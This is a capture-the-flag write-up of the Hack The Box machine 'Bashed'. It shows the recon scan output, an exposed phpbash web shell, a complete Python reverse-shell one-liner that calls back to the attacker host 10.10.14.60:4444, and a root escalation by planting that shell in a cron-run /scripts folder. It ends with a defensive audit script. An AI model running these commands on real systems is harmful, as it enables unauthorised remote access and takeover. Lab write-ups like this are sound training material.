Hack The Box “Bashed”

Arcy Caparros
5 min read · Jun 27, 2021

Disclaimer
This site contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.

Reconnaissance

First, let’s use nmapAutomator to automate the recon/enumeration process.

Summary of our nmap scan results:

---------------------Starting Nmap Basic Scan---------------------
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-27 09:30 EDT
Nmap scan report for 10.129.167.202
Host is up (0.089s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.49 seconds

Enumeration

Starting nikto scan
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.129.167.202
+ Target Hostname: 10.129.167.202
+ Target Port: 80
+ Start Time: 2021-06-27 09:43:01 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 1e3f, size: 55f8bbac32f80, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /dev/: Directory indexing found.
+ OSVDB-3092: /dev/: This might be interesting...
+ OSVDB-3268: /php/: Directory indexing found.
+ OSVDB-3092: /php/: This might be interesting...
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7916 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time: 2021-06-27 09:56:02 (GMT-4) (781 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌─[arcy24@parrot]─[~/Documents/htb/Bashed]
└──╼ $gobuster dir -u http://10.129.167.202/ -w /usr/share/wordlists/dirb/small.txt -x .php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.167.202/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/06/27 10:06:19 Starting gobuster in directory enumeration mode
===============================================================
/config.php (Status: 200) [Size: 0]
/css (Status: 301) [Size: 314] [--> http://10.129.167.202/css/]
/dev (Status: 301) [Size: 314] [--> http://10.129.167.202/dev/]
/images (Status: 301) [Size: 317] [--> http://10.129.167.202/images/]
/js (Status: 301) [Size: 313] [--> http://10.129.167.202/js/]
/php (Status: 301) [Size: 314] [--> http://10.129.167.202/php/]
/uploads (Status: 301) [Size: 318] [--> http://10.129.167.202/uploads/]
===============================================================
2021/06/27 10:06:37 Finished
===============================================================

PhpBash

Further enumeration of the phpbash website led us to /dev/, where we identified additional PHP files.

Without any further exploitation, simply opening ‘phpbash.php’ gave us the phpBash UI.

phpBash

Initial Foothold

From this stage you can grab user.txt and start enumerating further to gain root privileges.

From phpBash to netcat

I decided to create a reverse shell using nc so I could easily upload/download files if needed and roam around the system more comfortably while looking for privilege escalation paths.

I set up a netcat listener on port 4444,

and from the phpBash UI I ran my Python reverse shell command:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.60",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Upon execution from the phpBash UI, we have our reverse shell.

Privilege Escalation

I used linpeas (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) to look for possible local privilege escalation paths and came across the sudo rule ‘(scriptmanager : scriptmanager) NOPASSWD: ALL’.

/scripts folder

We found a Python script named ‘test.py’ in the /scripts folder; however, our current user has no permission to read the files within /scripts/.

Using (scriptmanager : scriptmanager)

Pivoting via scriptmanager, we were able to read ‘test.py’, which, when run, creates a text file called ‘test.txt’ containing the text ‘testing 123!’.

python script result

Reusing the Python reverse shell from our initial foothold, I applied the same concept, this time with a different port, and saved it to a file called ‘arcy24-script.py’.

Initially, I tried to execute arcy24-script.py manually within the ‘/scripts/’ folder; although the reverse shell worked, it ran as the scriptmanager account and not as root.

I re-initialized my netcat listener and waited a bit longer; a cron job ran and executed the script I had placed in the ‘/scripts/’ folder, and I got root.
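The root path above works because root’s cron executes whatever sits in a directory that a low-privileged account can write to. As an added defender-side example (not part of the original write-up or of the box), the following script audits such a directory: it flags entries writable by group or others, symlinks, and entries not owned by the account the cron job runs as. The ‘/scripts’ default and the ‘expected_uid’ parameter are assumptions for illustration.

```python
"""Audit a directory of scripts that a root cron job executes.

Added example (not from the original write-up): the Bashed privilege
escalation works because root's cron runs every script in /scripts,
yet a non-root user can drop files there. This check flags exactly
that class of misconfiguration so it can be fixed before it is abused.
"""
import os
import stat
import sys
from pathlib import Path

# Permission bits that let a non-owner modify a path.
GROUP_OR_OTHER_WRITE = stat.S_IWGRP | stat.S_IWOTH


def audit_script_dir(script_dir, expected_uid=0):
    """Return a list of (path, problem) tuples for a cron script directory.

    expected_uid is the account the cron job runs as (root by default);
    the directory itself and every entry below it should be owned by that
    account and be writable by nobody else.
    """
    findings = []
    root = Path(script_dir)
    for path in [root, *sorted(root.rglob("*"))]:
        st = path.lstat()  # do not follow links: a link itself is a finding
        if stat.S_ISLNK(st.st_mode):
            findings.append((str(path), "symlink in cron directory"))
            continue
        if st.st_uid != expected_uid:
            findings.append(
                (str(path), f"owned by uid {st.st_uid}, expected {expected_uid}")
            )
        if st.st_mode & GROUP_OR_OTHER_WRITE:
            findings.append((str(path), "writable by group or others"))
    return findings


if __name__ == "__main__":
    # Assumed default: the directory the cron job on Bashed iterates over.
    target = sys.argv[1] if len(sys.argv) > 1 else "/scripts"
    for where, problem in audit_script_dir(target):
        print(f"{where}: {problem}")
```

An empty result means root’s cron cannot be hijacked through this directory; any “writable by group or others” line is the condition exploited in this write-up.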

References

  1. phpBash — https://github.com/Arrexel/phpbash
  2. linpeas — https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
